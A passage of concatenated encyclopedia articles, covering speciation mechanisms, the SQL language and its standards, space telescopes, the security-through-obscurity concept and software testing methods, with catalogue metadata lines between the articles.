incomplete, then further mating between the populations will produce hybrids, which may or may not be fertile. If the hybrids are infertile, or fertile but less fit than their ancestors, then there will be further reproductive isolation and speciation has essentially occurred, as in horses and donkeys. One reasoning behind this is that if the parents of the hybrid offspring each have naturally selected traits for their own certain environments, the hybrid offspring will bear traits from both, therefore would not fit either ecological niche as well as either parent (ecological speciation). The low fitness of the hybrids would cause selection to favor assortative mating, which would control hybridization. This is sometimes called the Wallace effect after the evolutionary biologist Alfred Russel Wallace who suggested in the late 19th century that it might be an important factor in speciation. Conversely, if the hybrid offspring are more fit than their ancestors, then the populations will merge back into the same species within the area they are in contact. Another important theoretical mechanism is the arise of intrinsic genetic incompatibilities, addressed in the Bateson-Dobzhansky-Muller model. Genes from allopatric populations will have different evolutionary backgrounds and are never tested together until hybridization at secondary contact, when negative epistatic interactions will be exposed. In other words, new alleles will emerge in a population and only pass through selection if they work well together with other genes in the same population, but it may not be compatible with genes in an allopatric population, be those other newly derived alleles or retained ancestral alleles. This is only revealed through new hybridization. Such incompatibilities cause lower fitness in hybrids regardless of the ecological environment, and are thus intrinsic, although they can originate from the adaptation to different environments. The accumulation of such incompatibilities increases faster and faster with time, creating a "snowball" effect. There is a large amount of evidence supporting this theory, primarily from laboratory populations such as Drosophila and Mus, and some genes involved in incompatibilities have been identified. Reinforcement favoring reproductive isolation is required for both parapatric and sympatric speciation. Without reinforcement, the geographic area of contact between different forms of the same species, called their "hybrid zone", will not develop into a boundary between the different species. Hybrid zones are regions where diverged populations meet and interbreed. Hybrid offspring are common in these regions, which are usually created by diverged species coming into secondary contact. Without reinforcement, the two species would have uncontrollable inbreeding. Reinforcement may be induced in artificial selection experiments as described below. Ecological Ecological selection is "the interaction of individuals with their environment during resource acquisition". Natural selection is inherently involved in the process of speciation, whereby, "under ecological speciation, populations in different environments, or populations exploiting different resources, experience contrasting natural selection pressures on the traits that directly or indirectly bring about the evolution of reproductive isolation". Evidence for the role ecology plays in the process of speciation exists. Studies of stickleback populations support ecologically-linked speciation arising as a by-product, alongside numerous studies of parallel speciation, where isolation evolves between independent populations of species adapting to contrasting environments than between independent populations adapting to similar environments. Ecological speciation occurs with much of the evidence, "...accumulated from top-down studies of adaptation and reproductive isolation". Sexual selection Sexual selection can drive speciation in a clade, independently of natural selection. However the term "speciation", in this context, tends to be used in two different, but not mutually exclusive senses. The first and most commonly used sense refers to the "birth" of new species. That is, the splitting of an existing species into two separate species, or the budding off of a new species from a parent species, both driven by a biological "fashion fad" (a preference for a feature, or features, in one or both sexes, that do not necessarily have any adaptive qualities). In the second sense, "speciation" refers to the wide-spread tendency of sexual creatures to be grouped into clearly defined species, rather than forming a continuum of phenotypes both in time and space – which would be the more obvious or logical consequence of natural selection. This was indeed recognized by Darwin as problematic, and included in his On the Origin of Species (1859), under the heading "Difficulties with the Theory". There are several suggestions as to how mate choice might play a significant role in resolving Darwin's dilemma. If speciation takes place in the absence of natural selection, it might be referred to as nonecological speciation. Artificial speciation New species have been created by animal husbandry, but the dates and methods of the initiation of such species are not clear. Often, the domestic counterpart can still interbreed and produce fertile offspring with its wild ancestor. This is the case with domestic cattle, which can be considered the same species as several varieties of wild ox, gaur, and yak; and with domestic sheep that can interbreed with the mouflon. The best-documented creations of new species in the laboratory were performed in the late 1980s. William R. Rice and George W. Salt bred Drosophila melanogaster fruit flies using a maze with three different choices of habitat such as light/dark and wet/dry. Each generation was placed into the maze, and the groups of flies that came out of two of the eight exits were set apart to breed with each other in their respective groups. After thirty-five generations, the two groups and their offspring were isolated reproductively because of their strong habitat preferences: they mated only within the areas they preferred, and so did not mate with flies that preferred the other areas. The history of such attempts is described by Rice and Elen E. Hostert (1993). Diane Dodd used a laboratory experiment to show how reproductive isolation can develop in Drosophila pseudoobscura fruit flies after several generations by placing them in different media, starch- and maltose-based media. Dodd's experiment has been replicated many times, including with other kinds of fruit flies and foods. Such rapid evolution of reproductive isolation may sometimes be a relic of infection by Wolbachia bacteria. An alternative explanation is that these observations are consistent with sexually-reproducing animals being inherently reluctant to mate with individuals whose appearance or behavior is different from the norm. The risk that such deviations are due to heritable maladaptations is high. Thus, if an animal, unable to predict natural selection's future direction, is conditioned to produce the fittest offspring possible, it will avoid mates with unusual habits or features. Sexual creatures then inevitably group themselves into reproductively isolated species. Genetics Few speciation genes have been found. They usually involve the reinforcement process of late stages of speciation. In 2008, a speciation gene causing reproductive isolation was reported. It causes hybrid sterility between related subspecies. The order of speciation of three groups from a common ancestor may be unclear or unknown; a collection of three such species is referred to as a "trichotomy". Speciation via polyploidy Polyploidy is a mechanism that has caused many rapid speciation events in sympatry because offspring of, for example, tetraploid x diploid matings often result in triploid sterile progeny. However, among plants, not all polyploids are reproductively isolated from their parents, and gene flow may still occur, such as through triploid hybrid x diploid matings that produce tetraploids, or matings between meiotically unreduced gametes from diploids and gametes from tetraploids (see also hybrid speciation). It has been suggested that many of the existing plant and most animal species have undergone an event of polyploidization in their evolutionary history. Reproduction of successful polyploid species is sometimes asexual, by parthenogenesis or apomixis, as for unknown reasons many asexual organisms are polyploid. Rare instances of polyploid mammals are known, but most often result in prenatal death. Hybrid speciation Hybridization between two different species sometimes leads to a distinct phenotype. This phenotype can also be fitter than the parental lineage and as such natural selection may then favor these individuals. Eventually, if reproductive isolation is achieved, it may lead to a separate species. However, reproductive isolation between hybrids and their parents is particularly difficult to achieve and thus hybrid speciation is considered an extremely rare event. The Mariana mallard is thought to have arisen from hybrid speciation. Hybridization is an important means of speciation in plants, since polyploidy (having more than two copies of each chromosome) is tolerated in plants more readily than in animals. Polyploidy is important in hybrids as it allows reproduction, with the two different sets of chromosomes each being able to pair with an identical partner during meiosis. Polyploids also have more genetic diversity, which allows them to avoid inbreeding depression in small populations. Hybridization without change in chromosome number is called homoploid hybrid speciation. It is considered very rare but has been shown in Heliconius butterflies and sunflowers. Polyploid speciation, which involves changes in chromosome number, is a more common phenomenon, especially in plant species. Gene transposition Theodosius Dobzhansky, who studied fruit flies in the early days of genetic research in 1930s, speculated that parts of chromosomes that switch from one location to another might cause a species to split into two different species. He mapped out how it might be possible for sections of chromosomes to relocate themselves in a genome. Those mobile sections can cause sterility in inter-species hybrids, which can act as a speciation pressure. In theory, his idea was sound, but scientists long debated whether it actually happened in nature. Eventually a competing theory involving the gradual accumulation of mutations was shown to occur in nature so often that geneticists largely dismissed the moving gene hypothesis. However, 2006 research shows that jumping of a gene from one chromosome to another can contribute to the birth of new species. This validates the reproductive isolation mechanism, a key component of speciation. Rates There is debate as to the rate at which speciation events occur over geologic time. While some evolutionary biologists claim that speciation events have remained relatively constant and gradual over time (known as "Phyletic gradualism" – see diagram), some palaeontologists such as Niles Eldredge and Stephen Jay Gould have argued that species usually remain unchanged over long stretches of time, and that speciation occurs only over relatively brief intervals, a view known as punctuated equilibrium. (See diagram, and Darwin's dilemma.) Punctuated evolution Evolution can be extremely rapid, as shown in the creation of domesticated animals and plants in a very short geological space of time, spanning only a few tens of thousands of years. Maize (Zea mays), for instance, was created in Mexico in only a few thousand years, starting about 7,000 to 12,000 years ago. This raises the question of why the long term rate of evolution is far slower than is theoretically possible. Evolution is imposed on species or groups. It is not planned or striven for in some Lamarckist way. The mutations on which the process depends are random events, and, except for the "silent mutations" which do not affect the functionality or appearance of the carrier, are thus usually disadvantageous, and their chance of proving to be useful in the future is vanishingly small. Therefore, while a species or group might benefit from being able to adapt to a new environment by accumulating a wide range of genetic variation, this is to the detriment of the individuals who have to carry these mutations until a small, unpredictable minority of them ultimately contributes to such an adaptation. Thus, the capability to evolve would require group selection, a concept discredited by (for example) George C. Williams, John Maynard Smith and Richard Dawkins as selectively disadvantageous to the individual. The resolution to Darwin's second dilemma might thus come about as follows: If sexual individuals are disadvantaged by passing mutations on to their offspring, they will avoid mutant mates with strange or unusual characteristics. Mutations that affect the external appearance of their carriers will then rarely be passed on to the next and subsequent generations. They would therefore seldom be tested by natural selection. Evolution is, therefore, effectively halted or slowed down considerably. The only mutations that can accumulate in a population, on this punctuated equilibrium view, are ones that have no noticeable effect on the outward appearance and functionality of their bearers (i.e., they are "silent" or "neutral mutations", which can be, and are, used to trace the relatedness and age of populations and species.) This argument implies that evolution can only occur if mutant mates cannot be avoided, as a result of a severe scarcity of potential mates. This is most likely to occur in small, isolated communities. These occur most commonly on small islands, in remote valleys, lakes, river systems, or caves, or during the aftermath of a mass extinction. Under these circumstances, not only is the choice of mates severely restricted but population bottlenecks, founder effects, genetic drift and inbreeding cause rapid, random changes in the isolated population's genetic composition. Furthermore, hybridization with a related species trapped in the same isolate might introduce additional genetic changes. If an isolated population such as this survives its genetic upheavals, and subsequently expands into an unoccupied niche, or into a niche in which it has an advantage over its competitors, a new species, or subspecies, will have come into being. In geological terms, this will be an abrupt event. A resumption of avoiding mutant mates will thereafter result, once again, in evolutionary stagnation. In apparent confirmation of this punctuated equilibrium view of evolution, the fossil record of an evolutionary progression typically consists of species that suddenly appear, and ultimately disappear, hundreds of thousands or millions of years later, without any change in external appearance. Graphically, these fossil species are represented by lines parallel with the time axis, whose lengths depict how long each of them existed. The fact that the lines remain parallel with the time axis illustrates the unchanging appearance of each of the fossil species depicted on the graph. During each species' existence new species appear at random intervals, each also lasting many hundreds of thousands of years before disappearing without a change in appearance. The exact relatedness of these concurrent species is generally impossible to determine. This is illustrated in the diagram depicting the distribution of hominin species through time since the hominins separated from the line that led to the evolution of their closest living primate relatives, the chimpanzees. For similar evolutionary time lines see, for instance, the paleontological list of African dinosaurs, Asian dinosaurs, the Lampriformes and Amiiformes.
Biology and health sciences
Basics_4
Biology
29004
https://en.wikipedia.org/wiki/SQL
SQL
Structured Query Language (SQL) (pronounced S-Q-L; or alternatively as "sequel") is a domain-specific language used to manage data, especially in a relational database management system (RDBMS). It is particularly useful in handling structured data, i.e., data incorporating relations among entities and variables. Introduced in the 1970s, SQL offered two main advantages over older read–write APIs such as ISAM or VSAM. Firstly, it introduced the concept of accessing many records with one single command. Secondly, it eliminates the need to specify how to reach a record, i.e., with or without an index. Originally based upon relational algebra and tuple relational calculus, SQL consists of many types of statements, which may be informally classed as sublanguages, commonly: Data query Language (DQL), Data Definition Language (DDL), Data Control Language (DCL), and Data Manipulation Language (DML). The scope of SQL includes data query, data manipulation (insert, update, and delete), data definition (schema creation and modification), and data access control. Although SQL is essentially a declarative language (4GL), it also includes procedural elements. SQL was one of the first commercial languages to use Edgar F. Codd's relational model. The model was described in his influential 1970 paper, "A Relational Model of Data for Large Shared Data Banks". Despite not entirely adhering to the relational model as described by Codd, SQL became the most widely used database language. SQL became a standard of the American National Standards Institute (ANSI) in 1986 and of the International Organization for Standardization (ISO) in 1987. Since then, the standard has been revised multiple times to include a larger set of features and incorporate common extensions. Despite the existence of standards, virtually no implementations in existence adhere to it fully, and most SQL code requires at least some changes before being ported to different database systems. History SQL was initially developed at IBM by Donald D. Chamberlin and Raymond F. Boyce after learning about the relational model from Edgar F. Codd in the early 1970s. This version, initially called SEQUEL (Structured English Query Language), was designed to manipulate and retrieve data stored in IBM's original quasirelational database management system, System R, which a group at IBM San Jose Research Laboratory had developed during the 1970s. Chamberlin and Boyce's first attempt at a relational database language was SQUARE (Specifying Queries in A Relational Environment), but it was difficult to use due to subscript/superscript notation. After moving to the San Jose Research Laboratory in 1973, they began work on a sequel to SQUARE. The original name SEQUEL, which is widely regarded as a pun on QUEL, the query language of Ingres, was later changed to SQL (dropping the vowels) because "SEQUEL" was a trademark of the UK-based Hawker Siddeley Dynamics Engineering Limited company. The label SQL later became the acronym for Structured Query Language. After testing SQL at customer test sites to determine the usefulness and practicality of the system, IBM began developing commercial products based on their System R prototype, including System/38, SQL/DS, and IBM Db2, which were commercially available in 1979, 1981, and 1983, respectively. In the late 1970s, Relational Software, Inc. (now Oracle Corporation) saw the potential of the concepts described by Codd, Chamberlin, and Boyce, and developed their own SQL-based RDBMS with aspirations of selling it to the U.S. Navy, Central Intelligence Agency, and other U.S. government agencies. In June 1979, Relational Software introduced one of the first commercially available implementations of SQL, Oracle V2 (Version2) for VAX computers. By 1986, ANSI and ISO standard groups officially adopted the standard "Database Language SQL" language definition. New versions of the standard were published in 1989, 1992, 1996, 1999, 2003, 2006, 2008, 2011, 2016 and most recently, 2023. Syntax The SQL language is subdivided into several language elements, including: Clauses, which are constituent components of statements and queries. (In some cases, these are optional.) Expressions, which can produce either scalar values, or tables consisting of columns and rows of data Predicates, which specify conditions that can be evaluated to SQL three-valued logic (3VL) (true/false/unknown) or Boolean truth values and are used to limit the effects of statements and queries, or to change program flow. Queries, which retrieve the data based on specific criteria. This is an important element of SQL. Statements, which may have a persistent effect on schemata and data, or may control transactions, program flow, connections, sessions, or diagnostics. SQL statements also include the semicolon (";") statement terminator. Though not required on every platform, it is defined as a standard part of the SQL grammar. Insignificant whitespace is generally ignored in SQL statements and queries, making it easier to format SQL code for readability. Procedural extensions SQL is designed for a specific purpose: to query data contained in a relational database. SQL is a set-based, declarative programming language, not an imperative programming language like C or BASIC. However, extensions to Standard SQL add procedural programming language functionality, such as control-of-flow constructs. In addition to the standard SQL/PSM extensions and proprietary SQL extensions, procedural and object-oriented programmability is available on many SQL platforms via DBMS integration with other languages. The SQL standard defines SQL/JRT extensions (SQL Routines and Types for the Java Programming Language) to support Java code in SQL databases. Microsoft SQL Server 2005 uses the SQLCLR (SQL Server Common Language Runtime) to host managed .NET assemblies in the database, while prior versions of SQL Server were restricted to unmanaged extended stored procedures primarily written in C. PostgreSQL lets users write functions in a wide variety of languages—including Perl, Python, Tcl, JavaScript (PL/V8) and C. Interoperability and standardization Overview SQL implementations are incompatible between vendors and do not necessarily completely follow standards. In particular, date and time syntax, string concatenation, NULLs, and comparison case sensitivity vary from vendor to vendor. PostgreSQL and Mimer SQL strive for standards compliance, though PostgreSQL does not adhere to the standard in all cases. For example, the folding of unquoted names to lower case in PostgreSQL is incompatible with the SQL standard, which says that unquoted names should be folded to upper case. Thus, according to the standard, Foo should be equivalent to FOO, not foo. Popular implementations of SQL commonly omit support for basic features of Standard SQL, such as the DATE or TIME data types. The most obvious such examples, and incidentally the most popular commercial and proprietary SQL DBMSs, are Oracle (whose DATE behaves as DATETIME, and lacks a TIME type) and MS SQL Server (before the 2008 version). As a result, SQL code can rarely be ported between database systems without modifications. Reasons for incompatibility Several reasons for the lack of portability between database systems include: The complexity and size of the SQL standard means that most implementers do not support the entire standard. The SQL standard does not specify the database behavior in some important areas (e.g., indices, file storage), leaving implementations to decide how to behave. The SQL standard defers some decisions to individual implementations, such as how to name a results column that was not named explicitly. The SQL standard precisely specifies the syntax that a conforming database system must implement. However, the standard's specification of the semantics of language constructs is less well-defined, leading to ambiguity. Many database vendors have large existing customer bases; where the newer version of the SQL standard conflicts with the prior behavior of the vendor's database, the vendor may be unwilling to break backward compatibility. Little commercial incentive exists for vendors to make changing database suppliers easier (see vendor lock-in). Users evaluating database software tend to place other factors such as performance higher in their priorities than standards conformance. Standardization history SQL was adopted as a standard by the ANSI in 1986 as SQL-86 and the ISO in 1987. It is maintained by ISO/IEC JTC 1, Information technology, Subcommittee SC 32, Data management and interchange. Until 1996, the National Institute of Standards and Technology (NIST) data-management standards program certified SQL DBMS compliance with the SQL standard. Vendors now self-certify the compliance of their products. The original standard declared that the official pronunciation for "SQL" was an initialism: ("ess cue el"). Regardless, many English-speaking database professionals (including Donald Chamberlin himself) use the acronym-like pronunciation of ("sequel"), mirroring the language's prerelease development name, "SEQUEL". The SQL standard has gone through a number of revisions: Current standard The standard is commonly denoted by the pattern: ISO/IEC 9075-n:yyyy Part n: title, or, as a shortcut, ISO/IEC 9075. Interested parties may purchase the standards documents from ISO, IEC, or ANSI. Some old drafts are freely available. ISO/IEC 9075 is complemented by ISO/IEC 13249: SQL Multimedia and Application Packages and some Technical reports. Alternatives A distinction should be made between alternatives to SQL as a language, and alternatives to the relational model itself. Below are proposed relational alternatives to the SQL language. See navigational database and NoSQL for alternatives to the relational model. .QL: object-oriented Datalog 4D Query Language (4D QL) Datalog: critics suggest that Datalog has two advantages over SQL: it has cleaner semantics, which facilitates program understanding and maintenance, and it is more expressive, in particular for recursive queries. HTSQL: URL based query method IBM Business System 12 (IBM BS12): one of the first fully relational database management systems, introduced in 1982 ISBL jOOQ: SQL implemented in Java as an internal domain-specific language Java Persistence Query Language (JPQL): The query language used by the Java Persistence API and Hibernate persistence library JavaScript: MongoDB implements its query language in a JavaScript API. LINQ: Runs SQL statements written like language constructs to query collections directly from inside .Net code Object Query Language QBE (Query By Example) created by Moshè Zloof, IBM 1977 QUEL introduced in 1974 by the U.C. Berkeley Ingres project, closer to tuple relational calculus than SQL XQuery Distributed SQL processing Distributed Relational Database Architecture (DRDA) was designed by a workgroup within IBM from 1988 to 1994. DRDA enables network-connected relational databases to cooperate to fulfill SQL requests. An interactive user or program can issue SQL statements to a local RDB and receive tables of data and status indicators in reply from remote RDBs. SQL statements can also be compiled and stored in remote RDBs as packages and then invoked by package name. This is important for the efficient operation of application programs that issue complex, high-frequency queries. It is especially important when the tables to be accessed are located in remote systems. The messages, protocols, and structural components of DRDA are defined by the Distributed Data Management Architecture. Distributed SQL processing ala DRDA is distinctive from contemporary distributed SQL databases. Criticisms Design SQL deviates in several ways from its theoretical foundation, the relational model and its tuple calculus. In that model, a table is a set of tuples, while in SQL, tables and query results are lists of rows; the same row may occur multiple times, and the order of rows can be employed in queries (e.g., in the LIMIT clause). Critics argue that SQL should be replaced with a language that returns strictly to the original foundation: for example, see The Third Manifesto by Hugh Darwen and C.J. Date (2006, ). Orthogonality and completeness Early specifications did not support major features, such as primary keys. Result sets could not be named, and subqueries had not been defined. These were added in 1992. The lack of sum types has been described as a roadblock to full use of SQL's user-defined types. JSON support, for example, needed to be added by a new standard in 2016. Null The concept of Null is the subject of some debate. The Null marker indicates the absence of a value, and is distinct from a value of 0 for an integer column or an empty string for a text column. The concept of Nulls enforces the 3-valued-logic in SQL, which is a concrete implementation of the general 3-valued logic. Duplicates Another popular criticism is that it allows duplicate rows, making integration with languages such as Python, whose data types might make accurately representing the data difficult, in terms of parsing and by the absence of modularity. This is usually avoided by declaring a primary key, or a unique constraint, with one or more columns that uniquely identify a row in the table. Impedance mismatch In a sense similar to object–relational impedance mismatch, a mismatch occurs between the declarative SQL language and the procedural languages in which SQL is typically embedded. SQL data types The SQL standard defines three kinds of data types (chapter 4.1.1 of SQL/Foundation): predefined data types constructed types user-defined types. Constructed types are one of ARRAY, MULTISET, REF(erence), or ROW. User-defined types are comparable to classes in object-oriented language with their own constructors, observers, mutators, methods, inheritance, overloading, overwriting, interfaces, and so on. Predefined data types are intrinsically supported by the implementation. Predefined data types Character types Character (CHAR) Character varying (VARCHAR) Character large object (CLOB) National character types National character (NCHAR) National character varying (NCHAR VARYING) National character large object (NCLOB) Binary types Binary (BINARY) Binary varying (VARBINARY) Binary large object (BLOB) Numeric types Exact numeric types (NUMERIC, DECIMAL, SMALLINT, INTEGER, BIGINT) Approximate numeric types (FLOAT, REAL, DOUBLE PRECISION) Decimal floating-point type (DECFLOAT) Datetime types (DATE, TIME, TIMESTAMP) Interval type (INTERVAL) Boolean XML (see SQL/XML) JSON
Technology
Data modeling languages
null
29006
https://en.wikipedia.org/wiki/Space%20telescope
Space telescope
A space telescope (also known as space observatory) is a telescope in outer space used to observe astronomical objects. Suggested by Lyman Spitzer in 1946, the first operational telescopes were the American Orbiting Astronomical Observatory, OAO-2 launched in 1968, and the Soviet Orion 1 ultraviolet telescope aboard space station Salyut 1 in 1971. Space telescopes avoid several problems caused by the atmosphere, including the absorption or scattering of certain wavelengths of light, obstruction by clouds, and distortions due to atmospheric refraction such as twinkling. Space telescopes can also observe dim objects during the daytime, and they avoid light pollution which ground-based observatories encounter. They are divided into two types: Satellites which map the entire sky (astronomical survey), and satellites which focus on selected astronomical objects or parts of the sky and beyond. Space telescopes are distinct from Earth imaging satellites, which point toward Earth for satellite imaging, applied for weather analysis, espionage, and other types of information gathering. History In 1946, American theoretical astrophysicist Lyman Spitzer, "father of Hubble" proposed to put a telescope in space. Spitzer's proposal called for a large telescope that would not be hindered by Earth's atmosphere. After lobbying in the 1960s and 70s for such a system to be built, Spitzer's vision ultimately materialized into the Hubble Space Telescope, which was launched on April 24, 1990, by the Space Shuttle Discovery (STS-31). This was launched due to many efforts by Nancy Grace Roman, "mother of Hubble", who was the first Chief of Astronomy and first female executive at NASA. She was a program scientist that worked to convince NASA, Congress, and others that Hubble was "very well worth doing". The first operational space telescopes were the American Orbiting Astronomical Observatory, OAO-2 launched in 1968, and the Soviet Orion 1 ultraviolet telescope aboard space station Salyut 1 in 1971. Advantages Performing astronomy from ground-based observatories on Earth is limited by the filtering and distortion of electromagnetic radiation (scintillation or twinkling) due to the atmosphere. A telescope orbiting Earth outside the atmosphere is subject neither to twinkling nor to light pollution from artificial light sources on Earth. As a result, the angular resolution of space telescopes is often much higher than a ground-based telescope with a similar aperture. Many larger terrestrial telescopes, however, reduce atmospheric effects with adaptive optics. Space-based astronomy is more important for frequency ranges that are outside the optical window and the radio window, the only two wavelength ranges of the electromagnetic spectrum that are not severely attenuated by the atmosphere. For example, X-ray astronomy is nearly impossible when done from Earth, and has reached its current importance in astronomy only due to orbiting X-ray telescopes such as the Chandra X-ray Observatory and the XMM-Newton observatory. Infrared and ultraviolet are also largely blocked. Disadvantages Space telescopes are much more expensive to build than ground-based telescopes. Due to their location, space telescopes are also extremely difficult to maintain. The Hubble Space Telescope was serviced by the Space Shuttle, but most space telescopes cannot be serviced at all. Future of space observatories Satellites have been launched and operated by NASA, ISRO, ESA, CNSA, JAXA and the Soviet space program (later succeeded by Roscosmos of Russia). As of 2022, many space observatories have already completed their missions, while others continue operating on extended time. However, the future availability of space telescopes and observatories depends on timely and sufficient funding. While future space observatories are planned by NASA, JAXA and the CNSA, scientists fear that there would be gaps in coverage that would not be covered immediately by future projects and this would affect research in fundamental science. On 16 January 2023, NASA announced preliminary considerations of several future space telescope programs, including the Great Observatory Technology Maturation Program, Habitable Worlds Observatory, and New Great Observatories. List of space telescopes
Technology
Telescope
null
29087
https://en.wikipedia.org/wiki/Security%20through%20obscurity
Security through obscurity
In security engineering, security through obscurity is the practice of concealing the details or mechanisms of a system to enhance its security. This approach relies on the principle of hiding something in plain sight, akin to a magician's sleight of hand or the use of camouflage. It diverges from traditional security methods, such as physical locks, and is more about obscuring information or characteristics to deter potential threats. Examples of this practice include disguising sensitive information within commonplace items, like a piece of paper in a book, or altering digital footprints, such as spoofing a web browser's version number. While not a standalone solution, security through obscurity can complement other security measures in certain scenarios. Obscurity in the context of security engineering is the notion that information can be protected, to a certain extent, when it is difficult to access or comprehend. This concept hinges on the principle of making the details or workings of a system less visible or understandable, thereby reducing the likelihood of unauthorized access or manipulation. Security by obscurity alone is discouraged and not recommended by standards bodies. History An early opponent of security through obscurity was the locksmith Alfred Charles Hobbs, who in 1851 demonstrated to the public how state-of-the-art locks could be picked. In response to concerns that exposing security flaws in the design of locks could make them more vulnerable to criminals, he said: "Rogues are very keen in their profession, and know already much more than we can teach them." There is scant formal literature on the issue of security through obscurity. Books on security engineering cite Kerckhoffs' doctrine from 1883 if they cite anything at all. For example, in a discussion about secrecy and openness in nuclear command and control: [T]he benefits of reducing the likelihood of an accidental war were considered to outweigh the possible benefits of secrecy. This is a modern reincarnation of Kerckhoffs' doctrine, first put forward in the nineteenth century, that the security of a system should depend on its key, not on its design remaining obscure. Peter Swire has written about the trade-off between the notion that "security through obscurity is an illusion" and the military notion that "loose lips sink ships", as well as on how competition affects the incentives to disclose. There are conflicting stories about the origin of this term. Fans of MIT's Incompatible Timesharing System (ITS) say it was coined in opposition to Multics users down the hall, for whom security was far more an issue than on ITS. Within the ITS culture, the term referred, self-mockingly, to the poor coverage of the documentation and obscurity of many commands, and to the attitude that by the time a tourist figured out how to make trouble he'd generally got over the urge to make it, because he felt part of the community. One instance of deliberate security through obscurity on ITS has been noted: the command to allow patching the running ITS system (altmode altmode control-R) echoed as $$^D. Typing Alt Alt Control-D set a flag that would prevent patching the system even if the user later got it right. In January 2020, NPR reported that Democratic Party officials in Iowa declined to share information regarding the security of its caucus app, to "make sure we are not relaying information that could be used against us." Cybersecurity experts replied that "to withhold the technical details of its app doesn't do much to protect the system." Criticism Security by obscurity alone is discouraged and not recommended by standards bodies. The National Institute of Standards and Technology (NIST) in the United States recommends against this practice: "System security should not depend on the secrecy of the implementation or its components." The Common Weakness Enumeration project lists "Reliance on Security Through Obscurity" as CWE-656. A large number of telecommunication and digital rights management cryptosystems use security through obscurity, but have ultimately been broken. These include components of GSM, GMR encryption, GPRS encryption, a number of RFID encryption schemes, and most recently Terrestrial Trunked Radio (TETRA). One of the largest proponents of security through obscurity commonly seen today is anti-malware software. What typically occurs with this single point of failure, however, is an arms race of attackers finding novel ways to avoid detection and defenders coming up with increasingly contrived but secret signatures to flag on. The technique stands in contrast with security by design and open security, although many real-world projects include elements of all strategies. Obscurity in architecture vs. technique Knowledge of how the system is built differs from concealment and camouflage. The effectiveness of obscurity in operations security depends on whether the obscurity lives on top of other good security practices, or if it is being used alone. When used as an independent layer, obscurity is considered a valid security tool. In recent years, more advanced versions of "security through obscurity" have gained support as a methodology in cybersecurity through Moving Target Defense and cyber deception. NIST's cyber resiliency framework, 800-160 Volume 2, recommends the usage of security through obscurity as a complementary part of a resilient and secure computing environment.
Technology
Computer security
null
29090
https://en.wikipedia.org/wiki/Software%20testing
Software testing
Software testing is the act of checking whether software satisfies expectations. Software testing can provide objective, independent information about the quality of software and the risk of its failure to a user or sponsor. Software testing can determine the correctness of software for specific scenarios but cannot determine correctness for all scenarios. It cannot find all bugs. Based on the criteria for measuring correctness from an oracle, software testing employs principles and mechanisms that might recognize a problem. Examples of oracles include specifications, contracts, comparable products, past versions of the same product, inferences about intended or expected purpose, user or customer expectations, relevant standards, and applicable laws. Software testing is often dynamic in nature; running the software to verify actual output matches expected. It can also be static in nature; reviewing code and its associated documentation. Software testing is often used to answer the question: Does the software do what it is supposed to do and what it needs to do? Information learned from software testing may be used to improve the process by which software is developed. Software testing should follow a "pyramid" approach wherein most of your tests should be unit tests, followed by integration tests and finally end-to-end (e2e) tests should have the lowest proportion. Economics A study conducted by NIST in 2002 reported that software bugs cost the U.S. economy $59.5 billion annually. More than a third of this cost could be avoided if better software testing was performed. Outsourcing software testing because of costs is very common, with China, the Philippines, and India being preferred destinations. History Glenford J. Myers initially introduced the separation of debugging from testing in 1979. Although his attention was on breakage testing ("A successful test case is one that detects an as-yet undiscovered error."), it illustrated the desire of the software engineering community to separate fundamental development activities, such as debugging, from that of verification. Goals Software testing is typically goal driven. Finding bugs Software testing typically includes handling software bugs a defect in the code that causes an undesirable result. Bugs generally slow testing progress and involve programmer assistance to debug and fix. Not all defects cause a failure. For example, a defect in dead code will not be considered a failure. A defect that does not cause failure at one point in time may later occur due to environmental changes. Examples of environment change include running on new computer hardware, changes in data, and interacting with different software. A single defect may result in multiple failure symptoms. Ensuring requirements are satisfied Software testing may involve a Requirements gap omission from the design for a requirement. Requirement gaps can often be non-functional requirements such as testability, scalability, maintainability, performance, and security. Code coverage A fundamental limitation of software testing is that testing under all combinations of inputs and preconditions (initial state) is not feasible, even with a simple product. Defects that manifest in unusual conditions are difficult to find in testing. Also, non-functional dimensions of quality (how it is supposed to be versus what it is supposed to do) usability, scalability, performance, compatibility, and reliability can be subjective; something that constitutes sufficient value to one person may not to another. Although testing for every possible input is not feasible, testing can use combinatorics to maximize coverage while minimizing tests. Categorization Testing can be categorized many ways. Automated testing Levels Software testing can be categorized into levels based on how much of the software system is the focus of a test. Unit testing Integration testing System testing Static, dynamic, and passive testing There are many approaches to software testing. Reviews, walkthroughs, or inspections are referred to as static testing, whereas executing programmed code with a given set of test cases is referred to as dynamic testing. Static testing is often implicit, like proofreading, plus when programming tools/text editors check source code structure or compilers (pre-compilers) check syntax and data flow as static program analysis. Dynamic testing takes place when the program itself is run. Dynamic testing may begin before the program is 100% complete in order to test particular sections of code and are applied to discrete functions or modules. Typical techniques for these are either using stubs/drivers or execution from a debugger environment. Static testing involves verification, whereas dynamic testing also involves validation. Passive testing means verifying the system's behavior without any interaction with the software product. Contrary to active testing, testers do not provide any test data but look at system logs and traces. They mine for patterns and specific behavior in order to make some kind of decisions. This is related to offline runtime verification and log analysis. Exploratory Preset testing vs adaptive testing The type of testing strategy to be performed depends on whether the tests to be applied to the IUT should be decided before the testing plan starts to be executed (preset testing) or whether each input to be applied to the IUT can be dynamically dependent on the outputs obtained during the application of the previous tests (adaptive testing). Black/white box Software testing can often be divided into white-box and black-box. These two approaches are used to describe the point of view that the tester takes when designing test cases. A hybrid approach called grey-box that includes aspects of both boxes may also be applied to software testing methodology. White-box testing White-box testing (also known as clear box testing, glass box testing, transparent box testing, and structural testing) verifies the internal structures or workings of a program, as opposed to the functionality exposed to the end-user. In white-box testing, an internal perspective of the system (the source code), as well as programming skills are used to design test cases. The tester chooses inputs to exercise paths through the code and determines the appropriate outputs. This is analogous to testing nodes in a circuit, e.g., in-circuit testing (ICT). While white-box testing can be applied at the unit, integration, and system levels of the software testing process, it is usually done at the unit level. It can test paths within a unit, paths between units during integration, and between subsystems during a system–level test. Though this method of test design can uncover many errors or problems, it might not detect unimplemented parts of the specification or missing requirements. Techniques used in white-box testing include: API testing – testing of the application using public and private APIs (application programming interfaces) Code coverage – creating tests to satisfy some criteria of code coverage (for example, the test designer can create tests to cause all statements in the program to be executed at least once) Fault injection methods – intentionally introducing faults to gauge the efficacy of testing strategies Mutation testing methods Static testing methods Code coverage tools can evaluate the completeness of a test suite that was created with any method, including black-box testing. This allows the software team to examine parts of a system that are rarely tested and ensures that the most important function points have been tested. Code coverage as a software metric can be reported as a percentage for: Function coverage, which reports on functions executed Statement coverage, which reports on the number of lines 